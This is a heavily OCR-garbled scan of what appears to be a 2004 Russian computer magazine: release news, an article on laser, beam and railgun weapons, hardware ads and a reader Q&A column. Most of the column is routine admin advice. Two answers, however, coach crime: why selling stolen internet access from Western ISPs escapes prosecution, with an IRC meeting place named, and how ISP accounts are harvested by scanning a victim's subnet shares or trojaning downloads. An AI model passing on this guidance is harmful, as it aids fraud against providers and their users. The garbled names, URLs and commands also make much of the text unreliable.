Поскіуіе Р&й с последними Ыпих-технологиями 
для создания одной из быстрейших ОС на сегод- 
няшний день (время загрузки составляет всего че- 
тыре секунды). Система оптимизирована для рабо- 
ты на Іпіеі Репйипл и совместимых процессорах, ос- 
нащена графической технологией ЗЫАР от ЗсіТесІі 
Зойѵѵаге, работающей на 17% быстрее МісгозоЙ 
ѴѴіпбоѵѵз и на 25% быстрее, чем XII. В А1;1іепе 
Оезкіор ЕсІШоп 4.0 обеспечена совместимость со 
всеми І_іпих X1 1 -приложениями, в качестве ядра 
выбрано Ыпих кегпеі 2.6.5. І_іѵеСО позволяет загру- 
жать АІІіепе без установки на жесткий диск. Стои- 
мость АІІпепе Оезкіор ЕсІШоп 4.0 составляет 29.95 
долларов. 

Из других релизов: Сопесйѵа Ыпих 10, ССС 3.4.1, 
КОТЛсе 1.3.2, ЗіІѵегОЗ, ХХсе 4.0.6, ОгадопРІу 1.0, 
Ргодепу ОеЬіап 2.0 ВеХа 1 , РНР 5.0.0, Ребога Соге 3 
Тезі: 1 , ОрепОагѵѵіп 7.2. 1 , Орега 7.53, КОЕ 3.3 ВеХа 2, 
Вазіі 3.0, Сепіоо Ыпих 2004.2, Хапбгоз Оезкіор 03 
2.5, Ргепгу 0.3, ЗиЗЕ Ыпих Епіегргізе Зегѵег 9, 
Мапбгакеііпих 10.1 ВеХа 1. 
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таранияни писатепей-фантастов и голливудских киношников роль вооружения будущего прочно закрепилась за энергетический 
оружием. Это те самые бластеры, лазеры, яучеметы и прочие штуковины, стреляющие мощными потоками частиц, разрядами, 
электромагнитными излучениями и другими бестелесными субстанциями. Их главным преимуществом перед пулями и снарядами 
является мгновенное поражение цели. Идея квантового скачка в новую эру вооружений давно занимает умы военных. В сегодняшнем 
обзоре читай о самом интересном футуристическом оружии и перспективах модернизации классики. 



ВООРУЖЕНИЕ ВЕКО ХПЙ-ТЕК 



к. 



оследние десятилетия кипит 
работа над прототипами раз- 
нообразного энергетического 
оружия, проводятся его испы- 
тания. Законы физики ставят 
перед современными техноло- 
гиями такие барьеры, преодо- 
ление которых требует нере- 
альных экономических затрат. Пушки стои- 
мостью более 1 00 миллиардов долларов за 
штуку не по карману даже Пентагону. Боль- 
ше всего денег вбухано в космические сис- 
темы. Однако об их реальном боевом при- 
менении говорить пока рано. Ближе всех к 
практической реализации оказались мощные 
наземные и корабельные установки средней 
дальности. Но и они пока воспринимаются 
как очень и очень дорогие игрушки. Идеи 
индивидуального энергетического оружия на 
деле являются далекими и фантастическими. 

ПОЗЕР С ППЗЕРНЫМ ПРИЦЕПОМ 

Области применения лазеров необозримы. 
Куда ни сунься - кругом лазеры. Они исполь- 
зуются в медицине, связи, электронике и го- 
лографии. Хотя физическая суть у всех лазе- 
ров общая, принципы работы, как и возмож- 
ности, различаются. Военные ценят способ- 
ность лазеров концентрировать огромную 



энергию в очень узком луче. Это реально 
высокоточное оружие. На дальности 10 ки- 
лометров можно получить пятнышко диамет- 
ром всего 1 сантиметр. При этом твердо- 
тельный лазер мощностью всего 1 0 киловатт 
способен создавать луч с плотностью энер- 
гии в миллионы раз большей, чем на пове- 
рхности Солнца. Промышленные лазеры уже 
сегодня, как масло, режут стальные и тита- 
новые листы. Почему же карманный гипер- 
болоид инженера Гарина до сих пор остает- 
ся несбыточной мечтой? 

В первую очередь, нужна энергия для на- 
качки лазера. Чтобы получить пару десятков 
киловатт при КПД 20%, придется таскать с 
собой дизель-генератор весом несколько 
тонн. Остальные 80% будут расходоваться на 
тепло, которое необходимо отводить, иначе 
агрегат просто расплавится вместе со стрел- 
ком. Вентиляторами и водичкой тут не обой- 



тись. Кроме того, сами фокусирующие уст- 
ройства должны иметь приличные размеры 
для наименьшего расхождения луча на боль- 
ших дальностях. Установкам необходим еще 
и точный прицел, желательно лазерный. 
Шмалять наугад основным лучом - дело бес- 
перспективное. 

Футурологи уверенно предсказывают 
изобретение компактных источников боль- 
шой энергии. Действительно, в недрах атом- 
ных ядер и в химических реакциях скрыта 
колоссальная энергия, которую нужно лишь 
аккуратно высвободить. Но пока это удается 
сделать только в сопровождении взрыва. 
Правда, есть атомные электростанции, но 
они еще очень далеки от компактности. Се- 
годня о боевых лазерах можно говорить 
лишь как о стационарных вариантах для 
средств, способных нести многотонные си- 
ловые установки, - кораблей, самолетов, 
космических плат- 
форм. 

Первые серьез- 
ные испытания 
мощных лазеров 
класса «земля - воз- 
дух» проводились 
Пентагоном в начале 
80-х годов. На поли- 
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Пулы управления МІНАСЕ За четверть века проведе- 
но более 150 испытаний общей продолжительностью 
воздействия лазером 3000 секунд 



гоне Уайт Сэндс в Нью-Мексико была наг- 
лядно продемонстрирована возможность по- 
ражать баллистические ракеты. Химический 
лазер МІРАСЬ мощностью 2 мегаватта с рас- 
стояния 1 км дырявил неподвижно закреп- 
ленную вторую ступень ракеты Тйап-1 , раск- 
рашенную под советскую с соответствующей 
маркировкой. Чтобы сильнее бабахнуло, «Ти- 
тана» накачали сжатым газом. За 12 секунд 
«Чудо» так нагрело ракету, что, по словам 
руководителя программы СОИ, «лазер раз- 
нес эту штуковину буквально на куски». 

За 20 лет американцы доросли до первого 
тактического лазера, приспособленного для 
реального боевого применения. Совместно с 
израильтянами они совершенствуют мобиль- 
ную систему МТНЕІ_ (проект «Наутилус»). Ус- 
тановка неоднократно была опробована в 
деле. Она успешно сбивает реактивные сна- 
ряды «Хезболла». Близки к завершению и 
разработки твердотельных лазеров для по- 
ражения наземных и воздушных целей. Эти 
аппараты можно будет перевозить на джипе. 
Разрабатываются самолетные лазеры боль- 
шой мощности. 

Советский Союз экспериментировал с бо- 
евыми лазерами с 70-х годов. В подмосков- 
ном Троицке был создан газовый лазер 
мощностью 1 мегаватт. Установка, аналогич- 
ная МІВАСЦ была построена в Таджикиста- 
не. Существовали и другие проекты. В 1987 
году ракетой -носителем «Энергия» на орбиту 
была выведена 80-тонная боевая лазерная 
станция «Скиф-ДМ» («Полюс»). Но с замора- 
живанием гонки вооружений эксперименты 
по стрельбе в космосе были отменены. К ве- 




Ракета-носитель «Энергия» с полезной нагрузкой 
«Скиф-ДМ» («Полюс») 



«Я марсианин! - сказал он 
оставаться на местах, иначе 
бластер с фамагустой». 



ликой радости американцев, у которых до 
сих пор нет средств доставки на орбиту та- 
ких гигантских конструкций. «Скиф-ДМ» за- 
топили в Тихом океане. 

Л штники-шпхиды 

Космические лазеры, поражающие баллис- 
тические ракеты противника за тысячи кило- 
метров, теоретически будут еще больше в 
размерах. Так, химические лазеры для накач- 
ки требуют тонны топлива, охлаждающего ве- 
щества и компонентов самого рабочего тела, 
которое расходуется при каждом выстреле. 
Фокусирующие зеркала должны быть боль- 
шими и весьма тяжелыми. Самыми мощными 
из таких лазеров являются так называемые 
газодинамические. По сути, это реактивные 
двигатели, где молекулы фтористого водоро- 
да ускоряются до сверхзвуковых скоростей. 
Такой выхлоп нарушает привычные представ- 
ления о том, что у лазеров не бывает отдачи. 
В открытом космосе один выстрел унесет всю 
платформу вместе с лазером в очень далекое 
путешествие. Для компенсации реактивного 
импульса понадобятся дополнительные дви- 
гатели и много топлива. 

Между прочим, проблема отдачи была ре- 
шена советскими инженерами еще в 70-х го- 
дах. Каким образом - военная тайна ;-). 
Конструкторы ухитрились установить на пи- 
лотируемую станцию «Алмаз» 30-миллимет- 
ровую авиационную пушку Нудельмана для 
отстрела вражеских звездолетов при сбли- 
жении. Космонавты даже успешно из нее 
постреляли, сохраняя орбиту и точную ори- 
ентацию станции. 

Для звездных войн Пентагон готовит 
рентгеновские лазеры с ядерной накачкой. 
Они достаточно мощные, но намного компа- 
ктнее химических. У этих лазеров только 
один «маленький» недостаток - одноразо- 
вость. Мощный импульс излучения рентге- 
новских лазеров формируется в момент 
взрыва небольшого термоядерного заряда. 
Мировое сообщество всеми силами препят- 
ствует выводу на орбиту любых ядерных ус- 
тановок. Поэтому запускать такие платфор- 
мы Пентагон рассчитывает непосредственно 
при начале ракетной атаки противника. Су- 
ществует вариант «ронять» спутники на цели 
с последующим термоядерным взрывом. 

А ХИРУРГИЯ гппзо 

Вспоминаю свое первое знакомство с лазе- 
ром, когда еще не было ни сидиромов, ни 
эксимеров и лазерные указки не продава- 
лись в каждом ларьке. На лабораторном за- 
нятии я подносил стеклянную призму в кра- 
сивый рубиновый луч лазера и отклонял его 
в открытое окно соседнего здания. За что 
был наказан преподавателем-подполковни- 
ком, так как вполне мог засветить кому-ни- 
будь в глазик. Мощности тех лазеров хвата- 
ло лишь на пробивание дырок в копироваль- 
ной бумаге для последующих замеров штан- 

глуховатым голосом. - Всем 

пущу в ход аннигилирующий 

Г еоргий Шах. «О, марсиане!» 



БЕЙ ПОЗЕРОМ ПО БОНКОМ 

генциркулем (проверяли расходимость лу- 
ча). Однако ожог сетчатки при «удачном» по- 
падании был почти гарантирован. 

Вряд ли у тебя получится сконструировать 
самодельный лучемет, разобрав старый си- 
дюк или даже резак, который на раз прожи- 
гает болванки. Чтобы полупроводниковый 
лазер мощностью около 30 милливатт пов- 
редил глаз, нужно обеспечить прямое попа- 
дание в зрачок. А для этого придется пя- 
литься непосредственно в выходное отверс- 
тие лазера. Прицельное наведение в глаза 
выполнить непросто. Инфракрасный луч не- 
видим, хотя очень опасен. Светить лазером 
в дверные глазки бесполезно, так как плас- 
тиковая оптика для этого диапазона непроз- 
рачна. В случае с приличной оптикой, нап- 
ример, в приборах ночного видения снайпе- 
ров, в танках и самолетах, ослепить можно 
по полной программе. 

Женевская конвенция запрещает создание 
и использование ослепляющего оружия, счи- 
тая его зверским. США ратифицировали со- 
ответствующий протокол в 1999 году, и, по 
идее, должны были снять с вооружения 
подствольный лазер ЗаЬге 203, прикрепляе- 
мый к винтовке М-16. Эта штука пускала 
красные зайчики с гарантией ослепления на 
дальности до 300 метров. Запрет имеет ого- 
ворки. Так, если в самолет ударил луч бое- 
вого лазера с намерением просверлить в 
нем дырку, но попал при этом в глаз летчи- 
ку, никаких нарушений усмотрено не будет. 
Лазейку активно используют. В 2001 году 
российские ученые создали более мощный и 
универсальный аналог ЗаЬге 203, позицио- 
нируя его как инструмент борьбы с терро- 
ристами. Кроме подствольного, он сущест- 
вует в самостоятельном варианте с телеско- 
пической оптической системой. 

А ВСЕ ПУЧКОМ 

Современные лазеры являются наиболее 
проработанным видом энергетического ору- 
жия. Остальные находятся на стадии идей, 
теоретических изысканий и экспериментов. 
Следует выделить пучковое оружие. Его по- 
ражающая сила заключена в высокоэнерге- 
тических элементарных частицах - электро- 
нах, протонах и нейтронах, разгоняемых с 
помощью линейных ускорителей - синхрофа- 
зотронов. Разрушительная мощь таких пото- 
ков может быть очень велика, значительно 
больше, чем у световых квантов. Механизм 
воздействия отличается от лазерного. В то 
время как лазер сначала должен пробить по- 
верхность (оболочку) объекта, элементарные 
частицы проникают вглубь вещества и нару- 
шают работу цели изнутри. 

Поток частиц со скоростями, близкими к 
световой, мгновенно уничтожает цель на 
расстоянии нескольких километров. Однако 
эксперименты показали, что частицы несла- 
бо нагревают воздух. Воздух ионизируется, 
и электрические силы закручивают пучок, 
который при этом может свернуться в коль- 
цо. Все равно что стрелять из автомата в 
ванной комнате. Чтобы этого не произошло, 
можно, например, пробить для пучка канал к 
цели при помощи мощного лазера. 

Синхрофазотрон - вещь серьезная. По- 
мимо наземных вариантов, разместить та- 
кую дуру весом в десятки тонн можно 
разве что на авианосце. Военные моряки 
намерены использовать боевые ускорите- 
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А Рекомендую кни- 
гу Шмыгина А.И. 

«СОИ глазами рус- 
ского полковника», 
2000 г. Текст мож- 
но найти в интер- 
нете 

■вн 

А Если иноплане- 
тяне вдруг презен- 
туют тебе мощный 
ручной лазер, не 
стреляй там, где 
накурено или мно- 
го пыли. Сгоришь. 




А Все о рельсовых 
пушках: 

ѵтѵѵ.гаіідип.огд 



53 



ІМРІІШ 




«...Кучера в асбестовых латах и царевы доезжачие с 
мотопомпой набросились на обезумевших чудовищ, нанося им 
удары прикладами лазеров и мазеров». 

Станислав Лем. «Кибериада. Путешествие второе». 



ли частиц для поражения противокора- 
бельных крылатых ракет. 

ППОЗНЕННЫЕ КПИЗИЫ 

Плазма, она же ионизированный газ, - чет- 
вертое агрегатное состояние вещества, са- 
мое распространенное во Вселенной. Агре- 
гаты, способные вырабатывать высокотемпе- 
ратурную плазму, вполне можно использо- 
вать как оружие. Это будет похоже на очень 
мощный огнемет (фактически огонь - это то- 
же плазма). Получается плазма довольно 
легко - при электрических разрядах, при го- 
рении и взрывах, других высокотемператур- 
ных воздействиях на вещество. 

Интересно, что плазма образуется при 
функционировании многих давно известных 
видов оружия. Кумулятивная граната при 
взрыве формирует мощную струю высокотем- 
пературной плазмы, которая мгновенно дела- 
ет в толстой броне танка дыру. В рекламных 
целях такое оружие стали называть плазмен- 
ным. Взять, к примеру, пресловутые плаз- 
менные панели, к которым больше подходит 
термин «газоразрядные». Скорее, это просто 
дань хай-теку. Скоро лампы дневного света 
будет принято называть плазменным освеще- 
нием, а примус - плазменным нагревателем. 

Из новейших средств можно отметить 
безгильзовую электротепловую химическую 
пушку. Стреляет она обычными или специ- 
альными боеприпасами. По сути, это древ- 
няя пушка с запалом. Высоковольтный раз- 
ряд превращает зажигательную смесь в 
плазму и выталкивает заряд с огромной 
скоростью. 

Полицейский бесконтактный элекгрошокер 
51ип81гіке компании Хігете АКегпайѵе Оеіепзе 
Зузіетз, в отличие от классических тазеров, 
не требует дротиков-электродов с провода- 
ми. В сторону жертвы выстреливается узкий 
пучок специальной аэрозоли. Аэрозоль иони- 
зируется, образуя пространственный провод- 
ник для высоковольтного разряда. Дальность 
действия составляет 15 метров. 

Среди глобальных идей можно назвать 
буржуинский проект по формированию мно- 
гокилометровых ионизированных облаков- 
плазмоидов в верхних слоях атмосферы. 
Предполагается, что они будут парализовы- 
вать радиосвязь, работу электроники и даже 
воздействовать на здоровье людей. Анало- 
гичный проект разрабатывается в НИИ Ради- 
оприборостроения под руководством акаде- 
мика Авраменко. Цель наших плазмоидов - 
создание препятствий на пути ракет и других 
летящих объектов. 

А СКПЗОЧНЫЕ ЗВУКИ 

Шумовое оружие американцы планировали 
применить в Ираке. Звуковая пушка І_опд 
Рапде Асоизйс Оеѵісе (І_ПАЭ) поражает про- 
тивника направленным лучом пронзительно- 
го визга с уровнем до 130 децибел и часто- 
той от 2 до 3 кГ ц. Это слегка превышает 
уровень болевого порога и сравнимо с реак- 
тивным двигателем над ухом или концертом 
Ігоп Маібеп ;-). Ранее подобные установки 
использовались на военных кораблях для 
распугивания рыболовецких шхун. 

Не утихают споры и вокруг инфразвуково- 
го оружия. Колебания воздуха на частотах в 
диапазоне 3-10 Гц, как известно, могут вхо- 
дить в резонанс с внутренними органами че- 
ловека, вызывать их вибрацию и поврежде- 



ния. При этом люди и животные ощущают 
чувство немотивированного страха и паники. 
Говорят, где-то в секретных бункерах пыта- 
лись подобрать частоты для нейтрализации 
половых органов человека. Такой вариант то- 
же может в каком-то смысле деморализо- 
вать личный состав неприятеля. В любом 
случае, аэродинамические агрегаты для соз- 
дания мощного инфразвука будут иметь 
большие размеры. Воздействие невозможно 
локализовать в одном направлении. Заты- 
кать уши здесь бесполезно. Поражены будут 
все, включая оператора установки. 

Опушки но магнитол 

Немецкий журнал Зоібаі ипб ТесГіпік недавно 
поведал о таинственном происшествии в 
Ираке. Знаменитый американский танк «Аб- 
рамс» был прошит насквозь. В обеих стенках 
башни из суперпрочной антикумулятивной 
брони образовалось аккуратное отверстие 
диаметром всего 7 миллиметров! Такое не 
под силу ни одному оружию на Земле, за 
исключением... Вывод был таков - либо это 
инопланетяне, либо так называемая электро- 
магнитная, или рельсовая, пушка. Глава спе- 
циальной комиссии ЦРУ Чарльз Дефлер 
подтвердил, что найдены секретные доку- 
менты, касающиеся проекта создания гаіідип 
в Ираке. 

Разработка такой пушки велась в США, 
СССР и других странах с 70-х годов. Уста- 
новка весит до 1 00 тонн и имеет длину до 
100 метров. Суть механизма проста. По 
двум направляющим рельсам подается мощ- 
ный импульс тока. Между рельсами движет- 
ся тележка-снаряд, которая разгоняется под 
действием силы Лоренца. Фактически, это 
линейный электродвигатель постоянного то- 
ка. Конструкция должна быть очень точно 
просчитана, иначе снаряд, не успев разог- 
наться, испарится под действием огромного 
наведенного тока. 

Технология позволяет разгонять снаряды 
до гиперзвуковых скоростей. На испытаниях 
в США были получены скорости более 4 
км/с. В перспективе электромагнитные пуш- 
ки смогут обеспечить метание самонаводя- 
щихся снарядов массой около 3 кг на даль- 
ность до 5000 км со скоростью 35 км/с. При 
этом длина пушки составит 45 м. Обычные 
пороховые заряды на такое не способны да- 
же теоретически. Замечательным свойством 
рельсовых пушек является высокая скорост- 
рельность и способность стрелять очень лег- 
кими снарядами. Ваіідип может на огромном 
расстоянии «плеваться» кусочками плазмы 
весом менее одного грамма. 

Народной разновидностью электромаг- 
нитных пушек являются ружья Гаусса. Они 
гораздо ближе к квейковской рельсе по га- 
баритам. Принцип действия немного другой. 
На стволе устанавливается несколько элект- 
ромагнитных катушек с питанием от предва- 
рительно заряженных конденсаторов. Они 
втягивают снаряд, например гвоздь, после- 




довательно включаясь и отключаясь по мере 
его прохождения по стволу. Такие ружья мо- 
гут пробивать бутылки и фанеру. Описаний 
конструкций в интернете множество, в том 
числе на сайте ] [ 

(ѵѵш1.хакер.ги/ро$і/13054/сІе(аиІГа$р). Очень симпа- 
тичные пистолеты Гаусса делает Евгений Ва- 
сильев из Пскова (ѵѵѵѵѵѵ.рзкоѵіпТо.ги/соіІдип). 

А ЗПКПЮЧЕНИЕ 

Побочным продуктом пентагоновских науч- 
ных изысканий оказалась такая полезная 
штуковина, как интернет. Я надеюсь, что па- 
раллельные мирные открытия, включая мощ- 
ные источники халявной энергии, похоронят 
у человечества всякое желание воевать. Бе- 
да в том, что вояки будущего растут на се- 
годняшних компьютерных шутерах. Когда 
все эти палсганы, шок-райфлы, флэки и 
прочие бластеры и лазеры станут реаль- 
ностью, под знамена армии будущего вста- 
нут геймеры. Миллионы воинов с великолеп- 
ными навыками владения новым вооружени- 
ем и знанием тактики ведения боя в различ- 
ных условиях. Однажды мир на Земле будет 
в твоих руках. Дай мне слово: если стрелять, 
то только по банкам. Из лазера. 
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ПЕРЕДОВЫЕ 

ТЕХНОЛОГИИ 

ДОСТУПНЫМИ 



Оборудование для беспроводных сетей 



ОѴѴІ.-900АР+ 



0Е5-Ю26С 



- точки доступа, адаптеры, принт-серверы 

- скорость передачи до 1 08 Мбит/с 

- подключение по интерфейсу ІІЗВ, РСІ, РСМСІА 






011-5621! 



Коммутаторы для локальных сетей 

- 5/8/1 6/24/48 портов Разі ЕІІіегпеІ 

- 8/16/24/48 портов Разі ЕІІіегпеІ + 2 порта <ЗЕ 

- 5/8/16/24 порта ѲідаЬіІ ЕІНегпеІ 



Широкополосный доступ в Интернет 

- АбЗІ_-модемы, маршрутизаторы 

- порт для подключения к линии А05І_ 

- до 7 портов для подключения к сети Разі ЕІНегпеІ 



Аналоговые модемы 

- интерфейсы ІІЗВ, РСІ, Р13-232, РСМСІА 

- скорость передачи данных до 56 Кбит/с 

- протоколы передачи данных Ѵ.92/Ѵ.90 



Интернет-камеры 

- встроенный микрофон и датчик движения 

- скорость до 30 кадров в секунду 

- привод наклона и поворота (ОСЗ-5300) 

- максимальное разрешение 640x480 



РѴѴЬ520+ ОѴѴІ.-650+ 



I Р5І--200 




РЗЬ-бООО 




□С8-2000 



ОС5-5300 




АЭРТОН 

ГРУППА КОМПАНИЙ Н&К 



Москва Санкт-Петербург 

ул. Плющиха, д. 42. Тел.: (095) 710-7280 наб. Черной речки, д. 41. Тел.: (812) 331-9373 

шшш.аігіоп.ги шдоод.аігІопврЬ.ш 
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Я активно юзаю ІРС и недавно установил 
ВіІсбХ. Слышал, что его можно как-то «заск- 
ринить», что это такое? 

Ф Понятие «скринить» происходит от «зсгееп». В контексте ВХ это 

означает оставлять клиент в процессе и возвращаться в прежнюю 
ІВС-сессию даже после ІодоиТа. Все обеспечивается утилитой 
зсгееп, шаблон запуска клиента через нее - зсгееп ВйсІіХ піскпаше зегѵег -Н 
ѵіііиаі Ііозі. Когда труба зовет в поход и тебе нужно выйти из системы, нажи- 
маешь СМ+АИ+Р - и ты снова в консоли, тогда как клиент уже беайасІѴен, т.е. 
подвешен на автономную поддержку связи с ІВС-сервером. Чтобы вписаться 
обратно в сессию, устраиваем геаНасІп вызовом зсгееп -г в консоли. Зсгееп 
позволяет подвешивать сразу несколько процессов. О дополнительных фичах 
и наворотах можно почитать на тап -страницах. 
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Задавая вопросы, конкретизируй их. 
Давай больше информации о систеие, 
описывай абсолютно все, что ты знаешь 
о ней. Это мне поможет ответить на твои 
вопросы и указать твои ошибки. 

И не стоит задавать вопросов вроде 
«Как сломать шѵѵѵѵ-сервер?» ипи 
вообще просить у менн халявного 
Іпіегпеі'а. Я все равно не дам, я жадный :). 



Зарядил в систему свеженький ХР ЗР2, и у ме- 
ня перестал работать Ветоіе Оезкіор и шары 
вне домена тоже попадали. Что за дела и как 
их поправить? 



Меня впрягли ставить корпоративный 
файрвол под Упих. Вот мечусь, рефлексирую: 
Мапсігаке Соттипііу или Мапсігаке ОпісіаІ 
ставить? 



Мапсігаке 1 0.0 пришелся многим по душе, в том числе и корпоратив- 
ным пользователям, решившим сэкономить деньги, отказавшись от 
софта М5. Именно таким юзерам рекомендуются (ЖісіаІ релизы, как наиболее 
функциональные и стабильные. СотшипКу - это для модников-сковородников, 
которые хотят быть впереди планеты всей, потребляя только свежатину, расп- 
лачиваясь решением массы свежайших проблем. Однако если вопрос безопас- 
ности стоит довольно остро, я бы рекомендовал обратиться к полноценным 
ІІпіх-дистрибугивам: РгееВЗР или ОрепВЗО. 



С новым Зегѵісе Раск’ом М5 так заморочилась с безопасностью, 
что не надо баловаться! Пеплоіе Резкіор вне игры, т.к. после установ- 
ки пака по дефолту закрывается 3389 порт. Расшаренная инфа и принтеры 
оказываются досягаемы лишь внутри домена: закрыты коннекты по 137-139 и 
445 портам. Обе проблемы разруливаются через ѴѴР-конфигуратор (ѴѴіпсІоѵѵз 
РігеѵѵаІІ) сменой групповой политики (Огоир Роіісу) или правкой конфигов 
ІЧеЙѵѵ.іпі. Это, увы, не единственные осложнения с зесигйу после прописки 
5Р2. Настоятельно рекомендуется вызубрить мануалы с ѵѵѵѵѵѵ.тісго$оП.сот/1есИ- 
пеі/рго(ІіесІіпоІ/ѵѵіпхррго/таіпіаіп/ѵѵіпхр$р2.т$рх, где разбираются практически все воз- 
можные ХР 5Р2-проблемы. 



® 



Ф 

® 



Правда, что кого-то уже посадили за вардрай- 
винг, сканирование ѴѴі-Рі-сеток? 




На мой Упих-сервак постоянно идут атаки. Ка- 
кими способами можно ограничить коннекты 
по 85Н, чтобы можно было логиниться только 
с определенных ІР? 



Самый простой способ дарит нам ІРТАВІ_Е5. Сие делается одной 
строчкой конфига ірІаЫез -I ІІМРІІТ -і еІМ -р Іср -броіі ззіі -з 
192.1 68. 0.хх -\ АССЕРТ. Если ззіпсі запущен через іпей, то легко фильтровать 
коннекты встроенным АСІ_. Неплохой альтернативой кажется и ТСРѴѴгаррегз, с 
этой темой в деталях можно ознакомиться на ѵѵѵѵѵѵ.сІид.огд/ргезепіаііопз/зесигііуЛср- 
ѵѵгаррег$.ІМ 



Правда, что кого-то посадили за ношение отвертки? Да, если он за- 
колол соседку. Троих горе-хакеров осудили в США по обвинению в по- 
пытке хищения базы кредиток путем присоединения к ѴѴі-Рі-сети. Однажды го- 
ремыки катались по Мичигану в поисках чужих ѴѴІЖов. И нашли себе счастье 
- сетку І_оеѵѵе, через корпоративный портал которой злодеи пытались поднять- 
ся кредами. Жесткое обвинение было вынесено в связи с возможными потеря- 
ми (до $2.5М) фирмой и темным прошлым двух хакеров. За решеткой находит- 
ся лишь один, двух других отпустили под залог. 






Обеспечит ли 10 версия 5ип Зоіагіз 100% бе- 
зопасность для админа? 



Если и возможно обеспечить 100%, то это должно быть обеспече- 
но самим админом. Другое дело, что на отдельных ОС подобное обес- 
печение проходит наиболее продуктивно. Главное по теме зесиге’ности в де- 
сятой солярке - N1 ОгісІ Сопіаіпегз. Система разбивается на множество кон- 
тейнеров, и ни один из юзеров системы не может видеть (модифицировать) 
то, что творит другой. Даже гооі не получит доступа, если подобное не было 
прописано изначально в системе. Если один из контейнеров содержит крити- 
ческую ошибку, это никак не повлияет на работоспособность целой системы. 
Ргосезз ПідМз Мападетепі позволит наделять различными правами не толь- 
ко юзеров, но и отдельные процессы. Так что сбой отдельного процесса не 
повлияет на другие. ІІзег ВідМз Мападетепі напоминает тему процессов, 
только с применением ВВАС-технологии. Нововведение снизит шансы успеш- 
ного локального эксплойтинга. Аиіотаіесі РаісГі ТооІ поможет избежать проб- 
лем при установке новых зеси гіТу- патчей , неправильная конфигурация кото- 
рых чревата падением всей системы. Зоіагіз СгургодгарЫс Ргатеѵѵогк заточен 
под консолидацию используемых в системе операций шифрования, так что 
выбранный/разработанный организацией алгоритм шифрования можно будет 
легко применить и на сторонней системе. 




(I) 



Можно ли поправить реестр так, чтобы запус- 
кались сразу несколько асек? 



Можно, причем не только несколько ІСО-клиентов от МігаЬіІіз за- 
вести, но и подключить альтернативный софт вроде Миранды. Чтобы 
нововведения вступили в силу, нужно исправить реестр следующим образом: 

[НКЕУ_ШСАІ_МАСНШЕ\5оПѵѵаге\МігаЬіІіз\ІС0\0еГаиІіРгеГз] 

"Аиіо Іфсіаіе"^*) 9 

"0ѵѵпегзМітіі"= ,, Ѵе5 п 

"МиІііІпзіапсе ,,=,, Уе$" 
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Почему торговать краденым инетом от запад- 
ных провов (Едиапі, Іпіопеі, ВТ, АТТ) безопас- 
нее, чем российским? 



Торговать краденым инетом не только плохо, но и в любом случае 
небезопасно. Однако прочь морализаторство, вопрос есть вопрос. 
Дойка западных ІЗР обычно чревата меньшими осложнениями для злостного 
хакера точно так же, как и покупка по чужим кредиткам в западном шопе. До- 
тянуться западной руке правосудия до голодной и холодной России довольно 
проблематично и может стать дороже уже нанесенного ущерба. Проделки с 
отечественными провами с большей вероятностью будут наказаны, как и об- 
ман российских интернет-магазинов: свои люди - сочтемся, и семеро одного 
найдут... Чтобы более подробно узнать о специфике незаконной торговли, ха- 
кер иногда ходит на ІРС (ігс.х25.пеі.ги) и отыскивает коллег по ключевым словам 
«халявный инет» и «^гееіпеі». 



Плакать горькими слезами! Если перспектива не катит, то попробу- 
ем проиграть с минимальными потерями по следующему сценарию. 
Надо: отключить затрояненный бокс от сети, добыть все существующие патчи 
для системы, сохранить патчи в другую систему (/сІгіѵе/СОВ/еІс). Конечно же, 
забэкапить всю важную инфу из поверженного бокса. Исключить любые бинар- 
ники из бэкапа (они могут быть также заражены). Стереть партицию, где была 
установлена система (отформатировать заразу). Переставить ось, зарядить ее 
всеми патчами (находясь в офлайне, конечно). Создать свою Ыбсіеп-директо- 
рию, куда скопировать все ключевые файлы системы (Із, пе№1, іТсопТід): по 
оригиналам можно будет отследить, какие утилиты могли быть подменены. 
Только тогда, ни шагом раньше, можно вывести систему снова в онлайн. Не за- 
бывай про бэкапы и своевременные обновления в дальнейшем! 
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Есть ли софт, вроде антивируса, который най- 
дет ругкит в моем *піх’е? 



Сейчас можно найти кучу подобных гооШІ зсаппег’ов, которые поз- 
волят узнать, только ли тебе принадлежит система или тут уже покопал- 
ся грязный хэккер. Наиболее известный сканер подобного рода - сІікгооШІ 
(ѵшіІікгооШІогд). Он умеет искать конкретные ругкиты, точно зная их повадки. 
Другие продукты данного семейства обладают и эвристическим анализатором, 
который позволяет отыскивать прежде невиданную заразу. Недавно я познако- 
мился с гооМІіипІег’ом (ѵѵѵѵѵѵ.гооікіі.пі) и остался доволен. Сейчас поддержива- 
ются практически все известные дистрибутивы. Авторы довольно оперативно 
выпускают апдейты к новым осям. 
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Можно ли самому натырить аккаунтов запад- 
ных провов? 



Отдельные темные личности этим занимаются постоянно, без пе- 
рерывов на обед и ужин. Хотя в российском контексте подобные замуг- 
ки часто оказываются безрезультатны: за последние 5 лет использовать за- 
падные аккаунты на нашей родине стало порядком сложнее. Теперь проблема 
для множества виртуальных бандитов - как применить украденное, сродни 
«есть чем, было бы куда!». До 90% захваченных аккаунтов приходится на ска- 
нирование шаров (зііагесі- ресурсов), немного на трояны и совсем крохи - 
взлом провайдеров и их посредников, занимающихся перепродажей аккаун- 
тов. Зона сканирования (диапазон сабнета) выбирается относительно конк- 
ретного ІР, который был встречен однажды. Так, если у чела ІР 123.45.67.89, то по 
ѴѴІ10І5 (гіре.пеі, агіп.пеі) можно узнать, что его подсеть, к примеру, - 123.45.*.*. 
Именно данный разброс скармливается сканеру. Троянить юзеров конкретно- 
го прова оказывается сложнее для горемычного Іпаскег’а. Хотя один герой ан- 
деграунда сумел взломать зойѵѵаге-портал и давал скачивать протрояненный 
софт юзерам выбранных І5Р. Успешные взломы целых провайдеров все еще 
остаются, по большей части, гордыми секретами хакерского сообщества ;). 



Компьютер ЭКСИМЕР™ Ноте Рег^отапсе на 

базе процессора Іпіеі® Репііит® 4 с 
технологией Нурег-ТІігеасІіпд работает быстрее, 
чем вы ожидаете. 









Розничные продажи в Москве: 

М. ВИДЕО (095) 777-777-5, 8-800-777-777-5; Мосмарт (095) 783-85-20, 
783-85-21 ; Техносила (095) 777-8-777; МИР (095) 780-0000; 

Профком (095) 928-96-98, 928-79-70; Эльдорадо (095) 5-000-000. 
Дистрибуторы: компания Инлайн — г.Москва (095) 941 -6161 , 

ЗАО "Элком Сервис" — г.Сургут (3462) 31-19-91 , г.Нефтеюганск 
(34612) 2-47-03, г.Ханты-Мансийск (34671 ) 3-44-84 
Более 400 дилеров по всей территории России. 

Адрес ближайшего на ѵ\лл/ѵѵ.і2Ь.ги 

